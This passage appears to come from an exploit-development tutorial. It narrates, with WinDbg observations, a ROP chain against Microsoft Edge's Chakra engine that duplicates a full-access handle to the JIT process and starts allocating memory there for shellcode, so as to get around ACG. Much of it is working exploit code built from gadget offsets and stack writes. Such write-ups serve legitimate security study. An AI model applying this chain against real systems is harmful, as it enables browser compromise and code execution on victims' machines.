After reading in and storing this value, we can begin our ROP chain. Let’s now step through the chain together in WinDbg. As we can see from our DuplicateHandle ROP chain, we are overwriting the return address (which we previously overwrote with 0x4141414141414141 in our control-flow hijack proof-of-concept) with a ROP gadget of pop rdx ; ret, which is located at chakra_base + 0x1d2c9. Let’s set a breakpoint here, and detonate our exploit. Again, as a reminder - the __fastcall calling convention is in play - meaning arguments go in RCX, RDX, R8, R9, RSP + 0x20, etc.
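Since the chain jumps into the API instead of calling it, the stack-based arguments end up one QWORD further along than the usual RSP + 0x20. The following sketch works through that arithmetic; the function names are mine and purely illustrative. It describes the stack as seen at the first instruction of the callee, where [RSP] holds the return address and the next four QWORDs are the shadow space.

```javascript
const REGISTER_ARGS = ["RCX", "RDX", "R8", "R9"];

// Location of 1-based argument n as seen at the first instruction of the callee:
// [RSP] = return address, [RSP+0x8 .. RSP+0x20] = shadow space, then argument 5 onward.
function argLocation(n) {
    if (n >= 1 && n <= 4) return REGISTER_ARGS[n - 1];
    return "RSP+0x" + (0x28 + (n - 5) * 8).toString(16);
}

// Index of the QWORD to write in the chain for stack argument n (n >= 5), counting
// from the slot right after the jmp rax gadget: slot 0 is the fake return address
// and slots 1-4 are shadow space / padding.
function chainSlotForStackArg(n) {
    return 1 + 4 + (n - 5);
}

// DuplicateHandle takes seven arguments
for (let n = 1; n <= 7; n++) {
    console.log("arg " + n + " -> " + argLocation(n));
}
console.log("dwOptions is chain slot " + chainSlotForStackArg(7));
```

This lines up with the chain above: after the jmp rax gadget comes the add rsp, 0x38 ; ret "return address", then four padding QWORDs, then dwDesiredAccess, bInheritHandle, and dwOptions at RSP+0x28, RSP+0x30, and RSP+0x38.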

After hitting the breakpoint, we can inspect RSP to confirm our ROP chain has been written to the stack.

Our first gadget, as we know, is a pop rdx ; ret gadget. After execution of this gadget, we have stored a pseudo-handle with PROCESS_ALL_ACCESS into RDX.

This brings our function call to DuplicateHandle to the following state:

DuplicateHandle(
	-
	GetCurrentProcess(),	// Pseudo handle to the current process
	-
	-
	-
	-
	-
);

Our next gadget is mov r8, rdx ; add rsp, 0x48 ; ret. This will copy the pseudo-handle currently in RDX into R8 also.

We should also note that this ROP gadget increments the stack by 0x48 bytes. This is why in the ROP sequence we have 0x4141414141414141 padding “opcodes”. This padding is here to ensure that when the ret happens in our ROP gadget, execution returns to the next ROP gadget we want to execute, and not 0x48 bytes down the stack to a location we don’t intend execution to go to:

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
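The number of padding writes follows directly from the gadget: every 8 bytes that add rsp skips is one QWORD the chain has to fill. A small helper like the one below (hypothetical, not part of the exploit) can generate the padding so the count never has to be worked out by hand. It builds the chain in a plain array of BigInt values; in the exploit each entry would become a write64() followed by next().

```javascript
const PADDING = 0x4141414141414141n;

// How many QWORDs of padding a gadget needs for its "add rsp, N" before the ret
function paddingQwords(addRspBytes) {
    if (addRspBytes % 8 !== 0) {
        throw new Error("stack adjustment must be a multiple of 8");
    }
    return addRspBytes / 8;
}

// Append a gadget plus whatever padding its stack adjustment requires
function emitGadget(chain, gadgetAddress, addRspBytes = 0) {
    chain.push(gadgetAddress);
    for (let i = 0; i < paddingQwords(addRspBytes); i++) {
        chain.push(PADDING);
    }
}

const chain = [];
emitGadget(chain, 0x18001d2c9n);          // pop rdx ; ret (no stack adjustment)
chain.push(0xffffffffffffffffn);          // value popped into RDX
emitGadget(chain, 0x18024628bn, 0x48);    // mov r8, rdx ; add rsp, 0x48 ; ret

console.log("QWORDs in chain: " + chain.length);
console.log("padding for 0x48: " + paddingQwords(0x48));
```

For add rsp, 0x48 this gives nine padding QWORDs, matching the nine padding writes in the snippet above; for add rsp, 0x28 it gives five.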

This brings our DuplicateHandle call to the following state:

DuplicateHandle(
	-
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	-
	-
	-
	-
);

The next ROP gadget sequence contains an interesting item. The next item on our agenda will be to provide DuplicateHandle with an “output buffer” to write the new duplicated-handle (when the call to DuplicateHandle occurs). We achieve this by providing a memory address, which is writable, in R9. The address we will use is an empty address within the .data section of chakra.dll. We achieve this with the following ROP gadget:

mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret

As we can see, we load the address we want to place in R9 within RCX. The mov r9, rcx instruction will load our intended “output buffer” within R9, setting up our call to DuplicateHandle properly. However, there are some residual instructions we need to deal with - most notably the cmp r8d, [rax] instruction. As we can see, this instruction will dereference RAX (e.g. extract the contents that the value in RAX points to) and compare it to r8d. We don’t necessarily care about the cmp instruction so much as we do about the fact that RAX is dereferenced. This means in order for this ROP gadget to work properly, we need to load a valid pointer in RAX. In this exploit, we just choose an arbitrary readable address within the chakra.dll address space. Do not overthink “why did Connor choose this specific address”. This could be practically any readable address!

As we can see, RAX now has a valid pointer in it. Moving our, our next ROP gadget is a pop rcx ; ret gadget. As previously mentioned, we load the actual value we want to pass into DuplicateHandle via the R9 register into RCX. A future ROP gadget will copy RCX into the R9 register.

Our .data address of chakra.dll is loaded into RCX. This memory address is where our PROCESS_ALL_ACCESS handle to the JIT server will be located after our call to DuplicateHandle.

Now that we have prepared RAX with a valid pointer and prepared RCX with the address we want DuplicateHandle to write our PROCESS_ALL_ACCESS handle to, we hit the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret ROP gadget.

We have successfully copied our output “buffer”, which will hold our full-permissions handle to the JIT server after the DuplicateHandle call into R9. Next up, we can see the cmp r8d, dword ptr [rax] instruction. WinDbg now shows that the dereferenced contents of RAX contains some valid contents - meaning RAX was successfully prepared with a pointer to “bypass” this cmp check. Essentially, we ensure we don’t incur an access violation as a result of an invalid address being dereferenced by RAX.

The next item on the agenda is the je instruction - which performs the jump to the specified address above (chakra!Js::InternalStringComparer::Equals+0x28) if the preceding cmp found its operands equal, i.e. if subtracting the 32-bit value read from the address in RAX (dword ptr [rax] - the memory RAX points to, not the EAX register) from R8D (a 32-bit register) yields 0. As we know, we already prepared R8 with a value of 0xffffffffffffffff, so R8D is 0xffffffff - meaning the jump won’t take place, as the value it is compared against (0x7fff3d82e010 in this run, of which only the low 32 bits take part) does not match. After this, an add rsp, 0x28 instruction occurs - and, as we saw in our ROP gadget snippet at the beginning of this section of the blog, we pad the stack with 0x28 bytes to ensure execution returns into the next ROP gadget, and not into something we don’t intend it to (e.g. 0x28 bytes “down” the stack without any padding).
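
To make the 32-bit comparison concrete, here is a small model of the cmp r8d, [rax] ; je pair. It is only a sketch: jumpTaken and low32 are hypothetical helper names, and the value used for the memory behind RAX is simply the one quoted in the text for this run.

```javascript
// Model of `cmp r8d, [rax] ; je <target>`: only 32 bits of each operand are compared.
function low32(value) {
    return BigInt.asUintN(32, value);
}

// r8: full 64-bit register value; qwordAtRax: the 8 bytes stored at the address in RAX.
// On little-endian x64, `dword ptr [rax]` is the low 32 bits of that qword.
function jumpTaken(r8, qwordAtRax) {
    return low32(r8) === low32(qwordAtRax);
}

const r8 = 0xffffffffffffffffn;   // pseudo handle already loaded into R8
const atRax = 0x7fff3d82e010n;    // value quoted in the text for this run
console.log("je taken:", jumpTaken(r8, atRax));
```

The jump would only be taken if the dword behind RAX happened to be 0xffffffff, which is one more reason to point RAX at memory whose contents are known.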

Our call to DuplicateHandle is now at the following state:

DuplicateHandle(
	-
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	-
	-
	-
);

Since RDX, R8, and R9 are taken care of - we can finally fill in RCX with the handle to the JIT server that is currently within the s_jitManager. This is an “easy” ROP sequence - as the handle is stored in a global variable s_jitManager + 0x8 and we can just place it on the stack and pop it into RCX with a pop rcx ; ret gadget. We have already used our arbitrary read to leak the raw handle value (in this case it is 0xa64, but is subject to change on a per-process basis).

You may notice above the value of the stack changed. This is simply because I restarted Edge, and as we know - the stack changes on a per-process basis. This is not a big deal at all - I just wanted to make note to the reader.

After the pop rcx instruction - the PROCESS_DUP_HANDLE handle to the JIT server is stored in RCX.

Our call to DuplicateHandle is now at the following state:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	-
	-
	-
);

Per the __fastcall calling convention, every argument after the first four is placed onto the stack. Because we have an arbitrary write primitive, we can just directly write our next 3 arguments for DuplicateHandle to the stack - we don’t need any ROP gadgets to pop any further arguments. With this being said, we will go ahead and continue to use our ROP chain to actually place DuplicateHandle into the RAX register. We will then perform a jmp rax instruction to kick our function call off. So, for now, let’s focus on getting the address of kernelbase!DuplicateHandle into RAX. This begins with a pop rax instruction. As we can see below, RAX, after the pop rax, contains kernelbase!DuplicateHandle.

After RAX is filled with kernelbase!DuplicateHandle, the jmp rax instruction is queued for execution.

Let’s quickly recall our ROP chain snippet.

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

Let’s break down what we are seeing above:

  1. RAX contains kernelbase!DuplicateHandle
  2. kernelbase!DuplicateHandle is a function. When it is called legitimately, it ends in a ret instruction to return execution to where it was called (this is usually a return to the stack)
  3. Our “return” address jumps over our “shadow space”. Remember, __fastcall requires the 5th parameter, and subsequent parameters, begin at RSP + 0x20, RSP + 0x28, RSP + 0x30, etc. The space between RSP and RSP + 0x20, which is unused, is referred to as “shadow space”
  4. Our final three parameters are written directly to the stack

Step one is very self explanatory. Let’s explain steps two through four quickly. When DuplicateHandle is called legitimately, execution can be seen below.

Prior to the call:

After the call:

Notice what our call instruction does under the hood. call pushes the return address for DuplicateHandle onto the stack. When this push occurs, RSP decreases by 0x8, so every item already on the stack ends up 0x8 bytes further from RSP. Essentially, what was at RSP before the call is at RSP + 0x8 afterwards, and so forth. This is very important to us.

Recall that we do not actually call DuplicateHandle. Instead, we perform a jmp to it. Since we are using jmp, this doesn’t push a return address onto the stack for execution to return to. Because of this, we supply our own return address located at RSP when the jmp occurs - this “mimics” what call does. Additionally, this means we have to place our last three parameters 0x8 bytes further down the stack. Again, call would normally do this for us - but since call isn’t used here, we have to manually add our return address and manually shift the stack arguments by 0x8. This is because although __fastcall requires the 5th and subsequent parameters to start at RSP + 0x20 at the time of the call, the callee expects them 0x8 bytes further along, due to the return address pushed onto the stack. So tl;dr - although __fastcall says we put parameters at RSP + 0x20, we actually need to start them at RSP + 0x28.
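
The offset arithmetic can be sketched in a few lines. The function names below are hypothetical and exist only to illustrate the 0x20 versus 0x28 distinction; the parameter names are the last three DuplicateHandle arguments from the ROP chain.

```javascript
// Offset of the Nth argument (N >= 5) on x64 Windows, relative to RSP.
// Before `call`: arguments 5+ start at RSP+0x20 (after 0x20 bytes of shadow space).
// At function entry: the pushed return address shifts everything by 0x8.
const SHADOW_SPACE = 0x20;
const RETURN_ADDRESS = 0x8;

function stackArgOffsetBeforeCall(argNumber) {
    if (argNumber < 5) throw new RangeError("arguments 1-4 travel in RCX, RDX, R8, R9");
    return SHADOW_SPACE + (argNumber - 5) * 8;
}

function stackArgOffsetAtEntry(argNumber) {
    return stackArgOffsetBeforeCall(argNumber) + RETURN_ADDRESS;
}

for (const [n, name] of [[5, "dwDesiredAccess"], [6, "bInheritHandle"], [7, "dwOptions"]]) {
    console.log(name, "RSP+0x" + stackArgOffsetAtEntry(n).toString(16));
}
```

Because the chain enters the function with jmp, RSP already points at the fake return address, so the "at entry" offsets are the ones that matter when laying out the stack.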

The above will be true for all subsequent ROP chains.

So, after we get DuplicateHandle into RAX, we can write our final three arguments directly to the stack, leveraging our arbitrary write primitive.

Our call to DuplicateHandle is in its final state:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// NULL since we will set dwOptions to DUPLICATE_SAME_ACCESS
	0,			// FALSE (new handle isn't inherited)
	DUPLICATE_SAME_ACCESS	// Duplicate handle has same access as source handle (source handle is an all access handle, e.g. a pseudo handle), meaning the duplicated handle will be PROCESS_ALL_ACCESS
);

From here, we should be able to step into the function call to DuplicateHandle and execute it.

We can use pt to tell WinDbg to execute DuplicateHandle and pause when we hit the ret that exits the function.

At this point, our call should have been successful! As we see above, a value was placed in our “output buffer” to receive the duplicated handle. This value is 0x0000000000000ae8. If we run Process Hacker as an administrator, we can confirm that this is a handle to the JIT server with PROCESS_ALL_ACCESS!

Now that our function has succeeded, we need to make sure we return back to the stack in a manner that allows us to keep executing our ROP chain.

When the ret is executed we hit our “fake return address” we placed on the stack before the call to DuplicateHandle. Our return address will simply jump over the shadow space and our last three DuplicateHandle parameters, and allow us to keep executing further down the stack (where subsequent ROP chains will be).
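
As a sanity check on the padding, the landing spot of the return gadget can be worked out slot by slot. This is only a sketch: the slots array mirrors the stack layout written by the chain, and resumeIndex is a hypothetical helper.

```javascript
// Stack slots as laid out after the `jmp rax` gadget, one entry per 8 bytes.
// Index 0 is what RSP points at when DuplicateHandle starts executing.
const slots = [
    "add rsp, 0x38 ; ret",        // fake return address
    "pad", "pad", "pad", "pad",   // shadow space (0x20 bytes)
    "dwDesiredAccess",
    "bInheritHandle",
    "dwOptions",
    "next gadget",                // first slot of the following ROP chain
];

// Hypothetical helper: index of the slot the return gadget's `ret` pops.
function resumeIndex(returnSlot, addRspBytes) {
    const afterFunctionRet = returnSlot + 1;     // the function's ret pops the fake return address
    return afterFunctionRet + addRspBytes / 8;   // add rsp, N skips N/8 slots
}

console.log(slots[resumeIndex(0, 0x38)]);
```

The 0x38 bytes are exactly the four shadow-space slots plus the three stack parameters, so execution resumes at the first gadget of the next chain.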

At this point we have successfully obtained a PROCESS_ALL_ACCESS handle to the JIT server process. With this handle, we can begin the process of compromising the JIT process, where ACG is disabled.

VirtualAllocEx ROP Chain

Now that we possess a handle to the JIT server with enough permissions to perform things like memory operations, let’s use this PROCESS_ALL_ACCESS handle to allocate some memory within the JIT process. However, before examining the ROP chain, let’s recall the prototype for VirtualAllocEx, which takes five parameters: hProcess, lpAddress, dwSize, flAllocationType, and flProtect.

The function call will be as follows for us:

VirtualAllocEx(
	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	PAGE_READWRITE			// Make our memory readable and writable
);
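
The five parameters map onto registers and the stack as sketched below. assignSlots is a hypothetical helper written for this illustration; the constant values are the standard Win32 ones, and 0x1000 is the size the ROP chain actually writes in place of sizeof(shellcode).

```javascript
// Windows constants (values from the Win32 headers)
const MEM_COMMIT = 0x1000;
const MEM_RESERVE = 0x2000;
const PAGE_READWRITE = 0x04;

// Hypothetical helper: pair each argument with its x64 slot at function entry.
// The first four go in registers; the rest sit on the stack starting at RSP+0x28.
function assignSlots(args) {
    const registers = ["RCX", "RDX", "R8", "R9"];
    return args.map(([name, value], i) => ({
        name,
        value,
        slot: i < 4 ? registers[i] : "[RSP+0x" + (0x28 + (i - 4) * 8).toString(16) + "]",
    }));
}

const virtualAllocExArgs = assignSlots([
    ["hProcess", "fulljitHandle"],                   // read back from the .data slot at runtime
    ["lpAddress", 0],                                // NULL
    ["dwSize", 0x1000],                              // size used by the chain
    ["flAllocationType", MEM_COMMIT | MEM_RESERVE],
    ["flProtect", PAGE_READWRITE],
]);

console.table(virtualAllocExArgs);
```

Only flProtect ends up on the stack, which is why it is the single parameter the chain writes directly instead of loading through a gadget.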

Let’s first break down why our call to VirtualAllocEx is constructed the way it is. The call itself is very straightforward - we are allocating a region of memory the size of our shellcode in the JIT process, using our new handle to the JIT process. The main thing that sticks out is the PAGE_READWRITE allocation protection. As we recall, the JIT process doesn’t have ACG enabled - meaning it is quite possible to have dynamic RWX memory in such a process. However, there is a slight caveat when it comes to remote injection. ACG is documented to let processes that don’t have ACG enabled inject RWX memory into a process which does have ACG enabled. After all, ACG was created with Microsoft Edge in mind. Since Edge uses an out-of-process JIT server architecture, it makes sense that the process not protected by ACG (the JIT server) can inject into the process with ACG (the content process).

However, a process with ACG cannot inject into a process without ACG using RWX memory. Because of this, we will actually place our shellcode into the JIT server using RW permissions. Then, we will eventually copy a ROP chain into the JIT process which marks the shellcode as RWX from inside that process. This is possible, as ACG is disabled there. The main caveat is that the memory cannot be marked as RWX directly and remotely. At first, I tried allocating RWX memory, thinking I could just do simple process injection. However, after testing and seeing the API call fail, it turns out RWX memory can’t be allocated directly when the injection stems from a process protected by ACG into a non-ACG process. This will all make more sense later, if it doesn’t now, when we copy our ROP chain into the JIT process.

Here is the ROP chain we will be working with (we will include our DuplicateHandle chain for continuity. Every ROP chain from here on out will be included with the previous one to make readability a bit better):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtualAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
